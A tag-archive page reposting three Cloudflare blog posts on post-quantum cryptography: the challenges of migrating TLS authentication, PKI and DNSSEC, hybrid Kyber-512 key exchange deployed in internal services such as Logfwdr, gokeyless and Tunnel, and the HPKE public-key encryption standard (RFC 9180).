Tag Archives: research

The post-quantum future: challenges and opportunities

Post Syndicated from Sofía Celi original https://blog.cloudflare.com/post-quantum-future/

The post-quantum future: challenges and opportunities

“People ask me to predict the future, when all I want to do is prevent it. Better yet, build it. Predicting the future is much too easy, anyway. You look at the people around you, the street you stand on, the visible air you breathe, and predict more of the same. To hell with more. I want better.”
Ray Bradbury, from Beyond 1984: The People Machines

The post-quantum future: challenges and opportunities

The story and the path are clear: quantum computers are coming that will have the ability to break the cryptographic mechanisms we rely on to secure modern communications, but there is hope! The cryptographic community has designed new mechanisms to safeguard against this disruption. There are challenges: will the new safeguards be practical? How will the fast-evolving Internet migrate to this new reality? In other blog posts in this series, we have outlined some potential solutions to these questions: there are new algorithms for maintaining confidentiality and authentication (in a “post-quantum” manner) in the protocols we use. But will they be fast enough to deploy at scale? Will they provide the required properties and work in all protocols? Are they easy to use?

Adding post-quantum cryptography into architectures and networks is not only about being novel and looking at interesting research problems or exciting engineering challenges. It is primarily about protecting people’s communications and data because a quantum adversary can not only decrypt future traffic but, if they want to, past traffic. Quantum adversaries could also be capable of other attacks (by using quantum algorithms, for example) that we may be unaware of now, so protecting against them is, in a way, the challenge of facing the unknown. We can’t fully predict everything that will happen with the advent of quantum computers1, but we can prepare and build greater protections than the ones that currently exist. We do not see the future as apocalyptic, but as an opportunity to reflect, discover and build better.

What are the challenges, then? And related to this question: what have we learned from the past that enables us to build better in a post-quantum world?

Beyond a post-quantum TLS

As we have shown in other blog posts, the most important security and privacy properties to protect in the face of a quantum computer are confidentiality and authentication. The threat model of confidentiality is clear: quantum computers will not only be able to decrypt on-going traffic, but also any traffic that was recorded and stored prior to their arrival. The threat model for authentication is a little more complex: a quantum computer could be used to impersonate a party (by successfully mounting a monster-in-the-middle attack, for example) in a connection or conversation, and it could also be used to retroactively modify elements of the past message, like the identity of a sender (by, for example, changing the authorship of a past message to a different party). Both threat models are important to consider and pose a problem not only for future traffic but also for any traffic sent now.

In the case of using a quantum computer to impersonate a party: how can this be done? Suppose an attacker is able to use a quantum computer to compromise a user’s TLS certificate private key (which has been used to sign lots of past connections). The attacker can then forge connections and pretend that they come from the honest user (by signing with the user’s key) to another user, let’s say Bob. Bob will think the connections are coming from the honest user (as they all did in the past), when, in reality, they are now coming from the attacker.

We have algorithms that protect confidentiality and authentication in the face of quantum threats. We know how to integrate them into TLS, as we have seen in this blog post, so is that it? Will our connections then be safe? We argue that we will not yet be done, and these are the future challenges we see:

  • Changing the key exchange of the TLS handshake is simple; changing the authentication of TLS, in practice, is hard.
  • Middleboxes and middleware in the network, such as antivirus software and corporate proxies, can be slow to upgrade, hindering the rollout of new protocols.
  • TLS is not the only foundational protocol of the Internet, there are other protocols to take into account: some of them are very similar to TLS and they are easy to fix; others such as DNSSEC or QUIC are more challenging.

TLS (we will be focusing on its current version, which is 1.3) is a protocol that aims to achieve three primary security properties:

The first two properties are easy to maintain in a quantum-computer world: confidentiality is maintained by swapping the existing non-quantum-safe algorithm for a post-quantum one; integrity is maintained because the algorithms are intractable on a quantum computer. What about the last property, authentication? There are three ways to achieve authentication in a TLS handshake, depending on whether server-only or mutual authentication is required:

  1. By using a ‘pre-shared’ key (PSK) generated from a previous run of the TLS connection that can be used to establish a new connection (this is often called “session resumption” or “resuming” with a PSK),
  2. By using a Password-Authenticated Key Exchange (PAKE) for handshake authentication or post-handshake authentication (with the usage of exported authenticators, for example). This can be done by using the OPAQUE or the SPAKE protocols,
  3. By using public certificates that advertise parameters that are employed to assure (i.e., create a proof of) the identity of the party you are talking to (this is by far the most common method).

Securing the first authentication mechanism is easily achieved in the post-quantum sphere as a unique key is derived from the initial quantum-protected handshake. The second authentication mechanism does not pose a theoretical challenge (as public and private parameters are replaced with post-quantum counterparts) but rather faces practical limitations: certificate-based authentication involves multiple actors and it is difficult to properly synchronize this change with them, as we will see next. It is not only one public parameter and one public certificate: certificate-based authentication is achieved through the use of a certificate chain with multiple entities.

A certificate chain is a chain of trust by which different entities attest to the validity of public parameters to provide verifiability and confidence. Typically, for one party to authenticate another (for example, for a client to authenticate a server), a chain of certificates starting from a root’s Certificate Authority (CA) certificate is used, followed by at least one intermediate CA certificate, and finally by the leaf (or end-entity) certificate of the actual party. This is what you usually find in real-world connections. It is worth noting that the order of this chain (for TLS 1.3) does not require each certificate to certify the one immediately preceding it. Servers sometimes send both a current and deprecated intermediate certificate for transitional purposes, or are configured incorrectly.

What are these certificates? Why do multiple actors need to validate them? A (digital) certificate certifies the ownership of a public key by the named party of the certificate: it attests that the party owns the private counterpart of the public parameter through the use of digital signatures. A CA is the entity that issues these certificates. Browsers, operating systems or mobile devices operate CA “membership” programs where a CA must meet certain criteria to be incorporated into the trusted set. Devices accept their CA root certificates as they come “pre-installed” in a root store. Root certificates, in turn, are used to generate a number of intermediate certificates which will be, in turn, used to generate leaf certificates. This certificate chain process of generation, validation and revocation is not only a procedure that happens at a software level but rather an amalgamation of policies, rules, roles, and hardware2 and software needs. This is what is often called the Public Key Infrastructure (PKI).

All of the above goes to show that while we can change all of these parameters to post-quantum ones, it is not as simple as just modifying the TLS handshake. Certificate-based authentication involves many actors and processes, and it does not only involve one algorithm (as it happens in the key exchange phase) but typically at least six signatures: one handshake signature; two in the certificate chain; one OCSP staple and two SCTs. The last five signatures together are used to prove that the server you’re talking to is the right server for the website you’re visiting, for example. Of these five, the last three are essentially patches: the OCSP staple is used to deal with revoked certificates and the SCTs are to detect rogue CA’s. Starting with a clean slate, could we improve on the status quo with an efficient solution?

More pointedly, we can ask if indeed we still need to use this system of public attestation. The migration to post-quantum cryptography is also an opportunity to modify this system. The PKI as it exists is difficult to maintain, update, revoke, model, or compose. We have an opportunity, perhaps, to rethink this system.

Even without considering making fundamental changes to public attestation, updating the existing complex system presents both technical and management/coordination challenges:

  • On the technical side: are the post-quantum signatures, which have larger sizes and bigger computation times, usable in our handshakes? We explore this idea in this experiment, but we need more information. One potential solution is to cache intermediate certificates or to use other forms of authentication beyond digital signatures (like KEMTLS).
  • On the management/coordination side: how are we going to coordinate the migration of this complex system? Will there be some kind of ceremony to update algorithms? How will we deal with the situation where some systems have updated but others have not? How will we revoke past certificates?

This challenge brings into light that the migration to post-quantum cryptography is not only about the technical changes but is dependent on how the Internet works as the interconnected community that it is. Changing systems involves coordination and the collective willingness to do so.

On the other hand, post-quantum password-based authentication for TLS is still an open discussion. Most PAKE systems nowadays use Diffie-Hellman assumptions, which can be broken by a quantum computer. There are some ideas on how to transition their underlying algorithms to the post-quantum world; but these seem to be so inefficient as to render their deployment infeasible. It seems, though, that password authentication has an interesting property called “quantum annoyance”. A quantum computer can compromise the algorithm, but only one instance of the problem at the time for each guess of a password: “Essentially, the adversary must guess a password, solve a discrete logarithm based on their guess, and then check to see if they were correct”, as stated in the paper. Early quantum computers might take quite a long time to solve each guess, which means that a quantum-annoying PAKE combined with a large password space could delay quantum adversaries considerably in their goal of recovering a large number of passwords. Password-based authentication for TLS, therefore, could be safe for a longer time. But this does not mean, however, that it is not threatened by quantum adversaries.

The world of security protocols, though, does not end with TLS. There are many other security protocols (such as DNSSEC, WireGuard, SSH, QUIC, and more) that will need to transition to post-quantum cryptography. For DNSSEC, the challenge is complicated by the protocol not seeming to be able to deal with large signatures or high computation costs on verification time. According to research from SIDN Labs, it seems like only Falcon-512 and Rainbow-I-CZ can be used in DNSSEC (note that, though, there is a recent attack on Rainbow).

Scheme Public key size Signature size Speed of operations
Finalists
Dilithium2 1,312 2,420 Very fast
Falcon-512 897 690 Fast, if you have the right hardware
Rainbos-I-CZ 103,648 66 Fast
Alternate Candidates
SPHINCS+-128f 32 17,088 Slow
SPHINCS+-128s 32 7,856 Very slow
GeMSS-128 352,188 33 Very slow
Picnic3 35 14,612 Very slow

Table 1: Signature post-quantum algorithms. The orange rows show the suitable algorithms for DNSSEC.

What are the alternatives for a post-quantum DNSSEC? Perhaps, the isogeny-based signature scheme, SQISign, might be a solution if its verification time can be improved (which currently is 42 ms as noted in the original paper when running on a 3.40GHz Intel Core i7-6700 CPU over 250 runs for verification. Still slower than P-384. Recently, it has improved to 25ms). Another solution might be the usage of MAYO, which on an Intel i5-8400H CPU at 2.5GHz, a signing operation can take 2.50 million cycles, and a verification operation can take 1.3 million cycles. There is a lot of research that needs to be done to make isogeny-based cryptography faster so it will fit the protocol’s needs (research on this area is currently ongoing —see, for example, the Isogeny School) and provide assurance of their security properties. Another alternative could be using other forms of authentication for this protocol’s case, like using hash-based signatures.

DNSSEC is just one example of a protocol where post-quantum cryptography has a long road ahead, as we need hands-on experimentation to go along with technical updates. For the other protocols, there is timely research: there are, for example, proposals for a post-quantum WireGuard and for a post-quantum SSH. More research, though, needs to be done on the practical implications of these changes over real connections.

One important thing to note here is that there will likely be an intermediate period in which security protocols provide a “hybrid” set of algorithms for transitional purposes, compliance and security. “Hybrid” means that both a pre-quantum (or classical) algorithm and a post-quantum one are used to generate the secret used to encrypt or provide authentication. The security reason for using this hybrid mode is due to safeguarding in case post-quantum algorithms are broken. There are still many unknowns here (single code point, multiple codepoints, contingency plans) that we need to consider.

The failures of cryptography in practice

The Achilles heel for cryptography is often introducing it into the real-world. Designing, implementing, and deploying cryptography is notoriously hard to get right due to flaws in security proofs, implementation bugs, and vulnerabilities3 of software and hardware. We often deploy cryptography that is found to be flawed and the cost of fixing it is immense (it involves resources, coordination, and more). We have some previous lessons to draw from it as a community, though. For TLS 1.3, we pushed for verifying implementations of the standard, and for using tools to analyze the symbolic and computational models, as seen in other blog posts. Every time we design a new algorithm, we should aim for this same level of confidence, especially for the big migration to post-quantum cryptography.

In other blog posts, we have discussed our formal verification efforts, so we will not repeat these here. Rather let’s focus on what remains to be done on the formal verification front. Verification, analysis and implementation are not yet complete and we still need to:

  • Create easy-to-understand guides into what formal analysis is and how it can be used (as formal languages are unfamiliar to developers).
  • Develop user-tested APIs.
  • Flawless integration of a post-quantum algorithm’s API into protocols’ APIs.
  • Test and analyze the boundaries between verified and unverified code.
  • Verifying specifications at the standard level by, for example, integrating hacspec into IETF drafts.

Only in doing so can we prevent some of the security issues we have had in the past. Post-quantum cryptography will be a big migration and we can, if we are not careful, repeat the same issues of the past. We want a future that is better. We want to mitigate bugs and provide high assurance of the security of connections users have.

A post-quantum tunnel is born

The post-quantum future: challenges and opportunities

We’ve described the challenges of post-quantum cryptography from a theoretical and practical perspective. These are problems we are working on and issues that we are analyzing. They will take time to solve. But what can you expect in the short-term? What new ideas do we have? Let’s look at where else we can put post-quantum cryptography.

Cloudflare Tunnel is a service that creates a secure, outbound-only connection between your services and Cloudflare by deploying a lightweight connector in your environment. This is the end at the server side. At the other end, at the client side, we have WARP, a ‘VPN’ for client devices that can secure and accelerate all HTTPS traffic. So, what if we add post-quantum cryptography to all our internal infrastructure, and also add it to this server and the client endpoints? We would then have a post-quantum server to client connection where any request from the WARP client to a private network (one that uses Tunnel) is secure against a quantum adversary (how to do it will be similar to what is detailed here). Why would we want to do this? First, because it is great to have a connection that is fully protected against quantum computers. Second, because we can better measure the impacts of post-quantum cryptography in this environment (and even measure them in a mobile environment). This will also mean that we can provide guidelines to clients and servers on how to migrate to post-quantum cryptography. It would also be the first available service to do so at this scale. How will all of us experience this transition? Only time will tell, but we are excited to work towards this vision.

And, furthermore, as Tunnel uses the QUIC protocol in some cases and WARP uses the WireGuard protocol, this means that we can experiment with post-quantum cryptography in protocols that are novel and have not seen much experimentation in the past.

The post-quantum future: challenges and opportunities

So, what is the future in the post-quantum cryptography era? The future is better and not just the same. The future is fast and more secure. Deploying cryptography can be challenging and we have had problems with it in the past; but post-quantum cryptography is the opportunity to dream of better security, it is the path to explore, and it is the reality to make it happen.

Thank you for reading our post-quantum blog post series and expect more post-quantum content and updates from us!


If you are a student enrolled in a PhD or equivalent research program and looking for an internship for 2022, see open opportunities.

If you’re interested in contributing to projects helping Cloudflare, our engineering teams are hiring.

You can reach us with questions, comments, and research ideas at [email protected].

…..

1 And when we do predict, we often predict more of the same attacks we are accustomed to: adversaries breaking into connections, security being tampered with. Is this all that they will be capable of?
2The private part of a public key advertised in a certificate is often the target of attacks. An attacker who steals a certificate authority’s private keys is able to forge certificates, for example. Private keys are almost always stored on a hardware security module (HSM), which prevents key extraction. This is a small example of how hardware is involved in the process.
3Like constant-time failures, side-channel, and timing attacks.

Post-quantumify internal services: Logfwrdr, Tunnel, and gokeyless

Post Syndicated from Sofía Celi original https://blog.cloudflare.com/post-quantumify-cloudflare/

Post-quantumify internal services: Logfwrdr, Tunnel, and gokeyless

Post-quantumify internal services: Logfwrdr, Tunnel, and gokeyless

Theoretically, there is no impediment to adding post-quantum cryptography to any system. But the reality is harder. In the middle of last year, we posed ourselves a big challenge: to change all internal connections at Cloudflare to use post-quantum cryptography. We call this, in a cheeky way, “post-quantum-ifying” our services. Theoretically, this should be simple: swap algorithms for post-quantum ones and move along. But with dozens of different services in various programming languages (as we have at Cloudflare), it is not so simple. The challenge is big but we are here and up for the task! In this blog post, we will look at what our plan was, where we are now, and what we have learned so far. Welcome to the first announcement of a post-quantum future at Cloudflare: our connections are going to be quantum-secure!

What are we doing?

The life of most requests at Cloudflare begins and ends at the edge of our global network. Not all requests are equal and on their path they are transmitted by several protocols. Some of those protocols provide security properties whilst others do not. For the protocols that do, for context, Cloudflare uses: TLS, QUIC, WireGuard, DNSSEC, IPsec, Privacy Pass, and more. Migrating all of these protocols and connections to use post-quantum cryptography is a formidable task. It is also a task that we do not treat lightly because:

  • We have to be assured that the security properties provided by the protocols are not diminished.
  • We have to be assured that performance is not negatively affected.
  • We have to be wary of other requirements of our ever-changing ecosystem (like, for example, keeping in mind our FedRAMP certification efforts).

Given these requirements, we had to decide on the following:

  • How are we going to introduce post-quantum cryptography into the protocols?
  • Which protocols will we be migrating to post-quantum cryptography?
  • Which Cloudflare services will be targeted for this migration?

Let’s explore now what we chose: welcome to our path!

TLS and post-quantum in the real world

One of the most used security protocols is Transport Layer Security (TLS). It is the vital protocol that protects most of the data that flows over the Internet today. Many of Cloudflare’s internal services also rely on TLS for security. It seemed natural that, for our migration to post-quantum cryptography, we would start with this protocol.

The protocol provides three security properties: integrity, authentication, and confidentiality. The algorithms used to provide the first property, integrity, seem to not be quantum-threatened (there is some research on the matter). The second property, authentication, is under quantum threat, but we will not focus on it for reasons detailed later. The third property, confidentiality, is the one that we are interested in protecting as it is urgent to do this now.

Confidentiality assures that no one other than the intended receiver and sender of a message can read the transmitted message. Confidentiality is especially threatened by quantum computers as an attacker can record traffic now and decrypt it in the future (when they get access to a quantum computer): this means that all past and current traffic, not just future traffic, is vulnerable to be read by anyone who obtains a quantum computer (and has stored the encrypted traffic captured today).

At Cloudflare, to protect many of our connections, we use TLS. We mainly use the latest version of the protocol, TLS 1.3, but we do sometimes still use TLS 1.2 (as seen in the image, though, it only shows the connections between websites to our network).  As we are a company that pushes for innovation, this means that we are intent on using this time of migration to post-quantum cryptography as an opportunity to also update TLS handshakes to 1.3 and be assured that we are using TLS in the right way (by, for example, ensuring that we are not using deprecated features of TLS).

Post-quantumify internal services: Logfwrdr, Tunnel, and gokeyless
Cloudflare’s TLS and QUIC usage taken on the 17/02/2022 and showing the last 7 days.

Changing TLS 1.3 to provide quantum-resistant security for its confidentiality means changing the ‘key exchange’ phase of the TLS handshake. Let’s briefly look at how the TLS 1.3 handshake works.

Post-quantumify internal services: Logfwrdr, Tunnel, and gokeyless
The TLS 1.3 handshake

In TLS 1.3, there will always be two parties: a client and a server. A client is a party that wants the server to “serve” them something, which could be a website, emails, chat messages, voice messages, and more. The handshake is the process by which the server and client attempt to agree on a shared secret, which will be used to encrypt the subsequent exchange of data (this shared secret is called the “master secret”). The client selects their favorite key exchange algorithms and submits one or more “key shares” to the server (they send both the name of the key share and its public key parameter). The server picks one of the key exchange algorithms (assuming that it supports one of them), and replies back with their own key share. Both the server and the client then combine the key shares to compute a shared secret (the “master secret”), which is used to protect the remainder of the connection. If the client only chooses algorithms that the server does not support, the server instead replies with the algorithms that it does support and asks the client to try again. During this initial conversation, the client and server also agree on authentication methods and the parameters for encryption, but we can leave that aside for today in this blog post. This description is also simplified to focus only in the “key exchange” phase.

There is a mechanism to add post-quantum cryptography to this procedure: you advertise post-quantum algorithms in the list of key shares, so the final derived shared key (the “master secret”) is quantum secure. But there are requirements we had to take into account when doing this with our connections: the security of much post-quantum cryptography is still under debate and we need to respect our compliance efforts. The solution to these requirements is to use a “hybrid” mechanism.

A “hybrid” mechanism means to use both a “pre-quantum” or “classical” algorithm and a “post-quantum” algorithm, and mixing both generated shared secrets into the derivation of the “master secret”. The combination of both shared secrets is of the form \Z′ = Z || T\ (for TLS and with the fixed size shared secrets, simple concatenation is secure. In other cases, you have to be a bit more careful). This procedure is a concatenation consisting of:

The usage of a “hybrid” approach allows us to safeguard our connections in case the security of the post-quantum algorithm fails. It also results in a suitable-for-FIPS secret, as it is approved in the “Recommendation for Key-Derivation Methods in Key-Establishment Schemes” (SP 800-56C Rev. 2), which is listed in the Annex D, as an approved key establishing technique for FIPS 140-2.

At Cloudflare, we are using different TLS libraries. We decided to add post-quantum cryptography to those, specifically, to the BoringCrypto library or the compiled version of Golang with BoringCrypto. We added our implementation of the Kyber-512 algorithm (this algorithm can be eventually swapped by another one; we’re not picking any here. We are using it for our testing phase) to those libraries and implemented the “hybrid” mechanism as part of the TLS handshake. For the “classical” algorithm we used curve P-256. We then compiled certain services with these new TLS libraries.

Name of algorithm Number of times loop executed Average runtime per operation Number of bytes required per operation Number of allocations
Curve P-256 23,056 52,204 ns/op 256 B/op 5 allocs/op
Kyber-512 100,977 11,793 ns/op 832 B/op 3 allocs/op

Table 1: Benchmarks of the “key share” operation of Curve P-256 and Kyber-512: Scalar Multiplication and Encapsulation respectively. Benchmarks ran on Darwin, amd64, Intel(R) Core(TM) i7-9750H CPU @ 2.60 GHz.

Note that as TLS supports the described “negotiation” mechanism for the key exchange, the client and server have a way of mutually deciding what algorithms they want to use. This means that it is not required that both a client or a server support or even prefer the exact same algorithms: they just need to share support for a single algorithm for a handshake to succeed. In turn, herewith, even if we advertise post-quantum cryptography and a server/client does not support it, they will not fail but rather agree on some other algorithm they share.

A note on a matter we left on hold above: why are we not migrating the authentication phase of TLS to post-quantum? Certificate-based authentication in TLS, which is the one we commonly use at Cloudflare, also depends on systems on the wider Internet. Thus, changes to authentication require a coordinated and much wider effort to change. Certificates are attested as proofs of identity by outside parties: migrating authentication means coordinating a ceremony of migration with these outside parties. Note though that at Cloudflare we use a PKI with internally-hosted Certificate Authorities (CAs), which means that we can more easily change our algorithms. This will still need careful planning. We will not do this today, but we will in the near future.

Cloudflare services

The first step of our post-quantum migration is done. We have TLS libraries with post-quantum cryptography using a hybrid mechanism. The second step is to test this new mechanism in specific Cloudflare connections and services. We will look at three systems from Cloudflare that we have started migrating to post-quantum cryptography. The services in question are: Logfwrdr, Cloudflare Tunnel, and GoKeyless.

A post-quantum Logfwdr

Logfwdr is an internal service, written in Golang, that handles structured logs, and sends them from our servers for processing (to a subservice called ‘Logreceiver’) where they write them to Kafka. The connection between Logfwdr and Logreceiver is protected by TLS. The same goes for the connection between Logreceiver and Kafka in core. Logfwdr pushes its logs through “streams” for processing.

This service seemed an ideal candidate for migrating to post-quantum cryptography as its architecture is simple, it has long-lived connections, and it handles a lot of traffic. In order to first test the viability of using post-quantum cryptography, we created our own instance of Logreceiver and deployed it. We also created our own stream (the “pq-stream”), which is basically a copy of a HTTP stream (which was remarkably easy to add). We then compiled these services with the modified TLS library and we got a post-quantum protected Logfwdr.

Post-quantumify internal services: Logfwrdr, Tunnel, and gokeyless
Figure 1: TLS latency of Logfwdr for selected metals. Notice how post-quantum cryptography is faster than non-post-quantum one (it is labeled with a “PQ” acronym).

What we found was that using post-quantum cryptography is faster than using “classical” cryptography! This was expected, though, as we are using a lattice-based post-quantum algorithm (Kyber512). The TLS latency of both post-quantum handshakes and “classical” ones can be noted in Figure 1. The figure shows more handshakes are executed than usual behavior as these servers are frequently restarted.

Note though that we are not using “only” post-quantum cryptography but rather the “hybrid” mechanism described above. This could increase performance times: in this case, the increase was minimal and still kept the post-quantum handshakes faster than the classical ones. Perhaps what makes the TLS handshakes faster in the post-quantum case is the usage of TLS 1.3, as the “classical” Logfwdr is using TLS 1.2. Logfwdr, though, is a service that executes long-lived handshakes, so in aggregate TLS 1.2 is not “slower” but it does have a slower start time.

As shown in Figure 2, the average batch duration of the post-quantum stream is lower than when not using post-quantum cryptography. This may be in part due to the fact that we are not sending the quantum-protected data all the way to Kafka (as the non-post-quantum stream is doing). We didn’t yet change the connection to Kafka post-quantum.

Post-quantumify internal services: Logfwrdr, Tunnel, and gokeyless
Figure 2: Average batch send duration: post-quantum (orange) and non-post-quantum streams (green).

We didn’t encounter any failures during this testing that ran for about some weeks. This gave us good insight that putting post-quantum cryptography into our internal network with actual data is possible. It also gave us confidence to begin migrating codebases to modified TLS libraries, which we will maintain.

What are the next steps for Logfwdr? Now that we confirmed it is possible, we will first start migrating stream by stream to this hybrid mechanism until we reach full post-quantum migration.

A post-quantum gokeyless

gokeyless is our own way to separate servers and TLS long-term private keys. With it, private keys are kept on a specialized key server operated by customers on their own architecture or, if using Geo Key Manager, in selected Cloudflare locations. We also use it for Cloudflare-held private keys with a service creatively known as gokeyless-internal. The final piece of this architecture is another service called Keynotto. Keynotto is a service written in Rust that only mints RSA and ECDSA key signatures (that are executed with the stored private key).

How does the overall architecture of gokeyless work? Let’s start with a request. The request arrives at the Cloudflare network and we perform TLS termination. Any signing request is forwarded to Keynotto. A small portion of requests (specifically from GeoKDL or external gokeyless) cannot be handled by Keynotto directly, and are instead forwarded to gokeyless-internal. gokeyless-internal also acts as a key server proxy, as it redirects connections to the customer’s keyservers (external gokeyless). External gokeyless is both the server that a customer runs and the client that will be used to contact it. The architecture can be seen in Figure 3.

Post-quantumify internal services: Logfwrdr, Tunnel, and gokeyless
Figure 3: The life of a gokeyless request.

Migrating the transport that this architecture uses to post-quantum cryptography is a bigger challenge, as it involves migrating a service that lives on the customer side. So, for our testing phase, we decided to go for the simpler path that we are able to change ourselves: the TLS handshake between Keynotto and gokeyless-internal. This small test-bed means two things: first, that we needed to change another TLS library (as Keynotto is written in Rust) and, second, that we needed to change gokeyless-internal in such a way that it used post-quantum cryptography only for the handshakes with Keynotto and for nothing else. Note that we did not migrate the signing operations that gokeyless or Keynotto executes with the stored private key; we just migrated the transport connections.

Adding post-quantum cryptography to the rustls codebase was a straightforward exercise and we exposed an easy-to-use API call to signal the usage of post-quantum cryptography (as seen in Figure 4 and Figure 5). One thing that we noted when reviewing the TLS usage in several Cloudflare services is that giving the option to choose the algorithms for a ciphersuite, key share, and authentication in the TLS handshake confuses users. It seemed more straightforward to define the algorithm at the library level, and have a boolean or API call signal the need for this post-quantum algorithm.

Post-quantumify internal services: Logfwrdr, Tunnel, and gokeyless
Figure 4: post-Quantum API for rustls.
Post-quantumify internal services: Logfwrdr, Tunnel, and gokeyless
Figure 5: usage of the post-quantum API for rustls.

We ran a small test between Keynotto and gokeyless-internal with much success. Our next steps are to integrate this test into the real connection between Keynotto and gokeyless-internal, and to devise a plan for a customer post-quantum protected gokeyless external. This is the first instance in which our migration to post-quantum will not be ending at our edge but rather at the customer’s connection point.

A post-quantum Cloudflare Tunnel

Cloudflare Tunnel is a reverse proxy that allows customers to quickly connect their private services and networks to the Cloudflare network without having to expose their public IPs or ports through their firewall. It is mainly managed at the customer level through the usage of cloudflared, a lightweight server-side daemon, in their infrastructure. cloudflared opens several long-lived TCP connections (although, cloudflared is increasingly using the QUIC protocol) to servers on Cloudflare’s global network. When a request to a hostname comes, it is proxied through these connections to the origin service behind cloudflared.

The easiest part of the service to make post-quantum secure appears to be the connection between our network (with a service part of Tunnel called origintunneld located there) and cloudflared, which we have started migrating. While exploring this path and looking at the whole life of a Tunnel connection, we found something more interesting, though. When the Tunnel connections eventually reach core, they end up going to a service called Tunnelstore. Tunnelstore runs as a stateless application in a Kubernetes deployment, and to provide TLS termination (alongside load balancing and more) it uses a Kubernetes ingress.

The Kubernetes ingress we use at Cloudflare is made of Envoy and Contour. The latter configures the former depending on Kubernetes resources. Envoy uses the BoringSSL library for TLS. Switching TLS libraries in Envoy seemed difficult: there are thoughts on how to integrate OpenSSL to it (and even some thoughts on adding post-quantum cryptography) and ways to switch TLS libraries. Adding post-quantum cryptography to a modified version of BoringSSL, and then specifying that dependency in the Bazel file of Envoy seems to be the path to go for, as our internal test has confirmed (as seen in Figure 6). As for Contour, for many years, Cloudflare has been running their own patched version of it: we will have to again patch this version with our Golang library to provide post-quantum cryptography. We will make these libraries (and the TLS ones) available for usage.

Post-quantumify internal services: Logfwrdr, Tunnel, and gokeyless
Figure 6: Option to allow post-quantum cryptography in Envoy.

Changing the Kubernetes ingress at Cloudflare not only makes Tunnel completely quantum-safe (beyond the connection between our global network and cloudflared), but it also makes any other services using ingress safe. Our first tests on migrating Envoy and Contour to TLS libraries that contain post-quantum protections have been successful, and now we have to test how it behaves in the whole ingress ecosystem.

What is next?

The main tests are now done. We now have TLS libraries (in Go, Rust, and C) that give us post-quantum cryptography. We have two systems ready to deploy post-quantum cryptography, and a shared service (Kubernetes ingress) that we can change. At the beginning of the blog post, we said that “the life of most requests at Cloudflare begins and ends at the edge of our global network”: our aim is that post-quantum cryptography does not end there, but rather reaches all the way to where customers connect as well. Let’s explore the future challenges and this customer post-quantum path in this other blog post!

HPKE: Standardizing public-key encryption (finally!)

Post Syndicated from Christopher Wood original https://blog.cloudflare.com/hybrid-public-key-encryption/

HPKE: Standardizing public-key encryption (finally!)

For the last three years, the Crypto Forum Research Group of the Internet Research Task Force (IRTF) has been working on specifying the next generation of (hybrid) public-key encryption (PKE) for Internet protocols and applications. The result is Hybrid Public Key Encryption (HPKE), published today as RFC 9180.

HPKE was made to be simple, reusable, and future-proof by building upon knowledge from prior PKE schemes and software implementations. It is already in use in a large assortment of emerging Internet standards, including TLS Encrypted Client Hello and Oblivious DNS-over-HTTPS, and has a large assortment of interoperable implementations, including one in CIRCL. This article provides an overview of this new standard, going back to discuss its motivation, design goals, and development process.

A primer on public-key encryption

Public-key cryptography is decades old, with its roots going back to the seminal work of Diffie and Hellman in 1976, entitled “New Directions in Cryptography.” Their proposal – today called Diffie-Hellman key exchange – was a breakthrough. It allowed one to transform small secrets into big secrets for cryptographic applications and protocols. For example, one can bootstrap a secure channel for exchanging messages with confidentiality and integrity using a key exchange protocol.

HPKE: Standardizing public-key encryption (finally!)
Unauthenticated Diffie-Hellman key exchange

In this example, Sender and Receiver exchange freshly generated public keys with each other, and then combine their own secret key with their peer’s public key. Algebraically, this yields the same value \(g^{xy} = (g^x)^y = (g^y)^x\). Both parties can then use this as a shared secret for performing other tasks, such as encrypting messages to and from one another.

The Transport Layer Security (TLS) protocol is one such application of this concept. Shortly after Diffie-Hellman was unveiled to the world, RSA came into the fold. The RSA cryptosystem is another public key algorithm that has been used to build digital signature schemes, PKE algorithms, and key transport protocols. A key transport protocol is similar to a key exchange algorithm in that the sender, Alice, generates a random symmetric key and then encrypts it under the receiver’s public key. Upon successful decryption, both parties then share this secret key. (This fundamental technique, known as static RSA, was used pervasively in the context of TLS. See this post for details about this old technique in TLS 1.2 and prior versions.)

At a high level, PKE between a sender and receiver is a protocol for encrypting messages under the receiver’s public key. One way to do this is via a so-called non-interactive key exchange protocol.

To illustrate how this might work, let \(g^y\) be the receiver’s public key, and let \(m\) be a message that one wants to send to this receiver. The flow looks like this:

  1. The sender generates a fresh private and public key pair, \((x, g^x)\).
  2. The sender computes \(g^{xy} = (g^y)^x\), which can be done without involvement from the receiver, that is, non-interactively.
  3. The sender then uses this shared secret to derive an encryption key, and uses this key to encrypt m.
  4. The sender packages up \(g^x\) and the encryption of \(m\), and sends both to the receiver.

The general paradigm here is called “hybrid public-key encryption” because it combines a non-interactive key exchange based on public-key cryptography for establishing a shared secret, and a symmetric encryption scheme for the actual encryption. To decrypt \(m\), the receiver computes the same shared secret \(g^{xy} = (g^x)^y\), derives the same encryption key, and then decrypts the ciphertext.

Conceptually, PKE of this form is quite simple. General designs of this form date back for many years and include the Diffie-Hellman Integrated Encryption System (DHIES) and ElGamal encryption. However, despite this apparent simplicity, there are numerous subtle design decisions one has to make in designing this type of protocol, including:

  • What type of key exchange protocol should be used for computing the shared secret? Should this protocol be based on modern elliptic curve groups like Curve25519? Should it support future post-quantum algorithms?
  • How should encryption keys be derived? Are there other keys that should be derived? How should additional application information be included in the encryption key derivation, if at all?
  • What type of encryption algorithm should be used? What types of messages should be encrypted?
  • How should sender and receiver encode and exchange public keys?

These and other questions are important for a protocol, since they are required for interoperability. That is, senders and receivers should be able to communicate without having to use the same source code.

There have been a number of efforts in the past to standardize PKE, most of which focus on elliptic curve cryptography. Some examples of past standards include: ANSI X9.63 (ECIES), IEEE 1363a, ISO/IEC 18033-2, and SECG SEC 1.

HPKE: Standardizing public-key encryption (finally!)
Timeline of related standards and software

A paper by Martinez et al. provides a thorough and technical comparison of these different standards. The key points are that all these existing schemes have shortcomings. They either rely on outdated or not-commonly-used primitives such as RIPEMD and CMAC-AES, lack accommodations for moving to modern primitives (e.g., AEAD algorithms), lack proofs of IND-CCA2 security, or, importantly, fail to provide test vectors and interoperable implementations.

The lack of a single standard for public-key encryption has led to inconsistent and often non-interoperable support across libraries. In particular, hybrid PKE implementation support is fractured across the community, ranging from the hugely popular and simple-to-use NaCl box and libsodium box seal implementations based on modern algorithm variants like X-SalsaPoly1305 for authenticated encryption, to BouncyCastle implementations based on “classical” algorithms like AES and elliptic curves.

Despite the lack of a single standard, this hasn’t stopped the adoption of ECIES instantiations for widespread and critical applications. For example, the Apple and Google Exposure Notification Privacy-preserving Analytics (ENPA) platform uses ECIES for public-key encryption.

